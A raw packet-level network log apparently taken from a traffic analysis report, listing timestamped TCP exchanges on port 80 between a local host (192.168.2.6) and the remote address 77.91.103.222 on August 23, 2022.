                                                                                                                                                                      Aug 23, 2022 18:26:25.963290930 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963315964 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963341951 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963345051 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963368893 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963406086 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963407993 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963490009 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963516951 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963526964 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963540077 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963562965 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963566065 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963592052 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963606119 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963649035 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963689089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963711977 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963732004 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963737011 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963753939 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963781118 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963792086 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963816881 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963830948 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963859081 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963872910 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963917971 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963953972 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.963994026 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.963995934 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964036942 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964036942 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964077950 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964078903 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964117050 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964119911 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964145899 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964159966 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964169979 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964184999 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964195967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964207888 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964235067 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964238882 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964281082 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964368105 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964395046 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964411974 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964420080 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964438915 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964445114 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964467049 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964479923 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964514971 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964555979 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.964838982 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.964917898 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965015888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965066910 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965128899 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965176105 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965208054 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965234995 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965267897 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965276957 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965284109 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965325117 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965364933 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965390921 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965396881 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965413094 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965426922 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965440035 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965464115 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965496063 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965502977 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965518951 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965543032 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965560913 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965590954 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965692997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965764046 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965778112 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965810061 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965847969 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965873003 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965893984 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965922117 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.965924978 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.965974092 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966008902 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966054916 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966135025 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966161013 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966187000 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966208935 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966283083 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966331005 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966362000 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966399908 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966406107 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966420889 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966432095 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966449976 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966483116 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966500998 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966552019 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966605902 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966619968 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966658115 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966684103 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966743946 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966764927 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966792107 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966810942 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966815948 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966830969 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966871023 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966871023 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966912031 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966922998 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966953039 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.966968060 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966991901 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.966995955 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967051029 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.967166901 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967191935 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967216015 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967223883 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.967235088 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.967248917 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.967278957 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967303038 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967365026 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.967380047 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967405081 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967426062 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.967448950 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.967518091 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.967575073 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.970316887 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.970458031 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.971220970 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.971257925 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.971304893 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.971434116 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.971482038 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.971522093 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.972054958 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.973038912 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.973123074 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.973459959 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.973525047 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.974344015 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.974425077 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.975265980 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.975326061 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.975680113 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.975745916 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.976454020 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.976526022 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.976577044 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.976609945 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.976636887 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.976665974 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.976687908 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.976707935 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.976716042 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.976748943 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.976752996 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.976790905 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.976875067 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.976917982 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.977127075 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.977164030 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.977178097 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.977221966 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.977348089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.977396011 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.977828026 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.977860928 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978101969 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978183031 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978219986 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978302002 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978394032 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978400946 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978439093 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978446007 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978473902 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978493929 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978513956 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978519917 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978585005 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978622913 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978662968 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978703976 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978741884 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978780985 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978821993 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978859901 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978890896 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978957891 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978970051 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978971958 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978974104 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978976011 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978977919 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978977919 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.978981018 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978982925 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.978985071 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979063988 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979074001 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979113102 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979116917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979159117 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979166985 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979213953 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979219913 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979260921 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979274035 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979327917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979363918 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979392052 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979407072 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979446888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979459047 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979484081 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979526043 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979557991 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979572058 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979573965 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979577065 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979620934 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979629993 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979676008 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979717016 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979758978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979865074 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979912996 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.979919910 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979964972 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.979968071 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980001926 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980005026 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980043888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980046034 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980089903 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980101109 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980149984 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980159044 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980204105 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980206013 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980251074 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980278969 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980324030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980334997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980487108 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.980542898 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980581999 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980669975 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980866909 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980931997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.980971098 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981101990 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981198072 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981231928 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981271029 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981280088 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981312037 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981421947 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981470108 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981525898 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981564999 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981568098 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981605053 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981648922 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981693983 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981796026 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981837988 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981839895 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981877089 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981900930 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981939077 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981947899 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.981975079 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.981977940 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.982013941 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.982050896 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:25.982070923 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:25.982088089 CEST804983377.91.103.222192.168.2.6
